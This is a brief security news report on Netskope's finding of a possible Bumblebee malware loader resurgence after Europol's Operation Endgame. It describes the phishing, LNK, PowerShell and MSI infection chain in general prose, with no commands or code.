"Netskope Reports Possible Bumblebee Loader Resurgence"

According to security researchers at Netskope, the Bumblebee malware loader could have re-emerged months after Europol-led Operation Endgame disrupted it in May 2024.  Researchers have uncovered a new infection chain that deploys Bumblebee malware.  The researchers noted that this was the first occurrence of a Bumblebee campaign since Operation Endgame, a law enforcement operation performed by Europol and partners in May 2024 that disrupted major malware botnets.  Bumblebee is a sophisticated malware loader that cybercriminal groups have actively used to distribute various types of malware, such as ransomware, infostealers, and other malicious payloads.  The researchers noted that the new infection chain likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it.  The ZIP file contains an LNK file named "Report-41952.lnk" that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns.  Once opened, the LNK file executes a Powershell command to download a Microsoft Installer (MSI) file from a remote server, renames it as "%AppData%\y.msi" and then executes/installs it using the Microsoft msiexec.exe tool.

Infosecurity Magazine reports: "Netskope Reports Possible Bumblebee Loader Resurgence"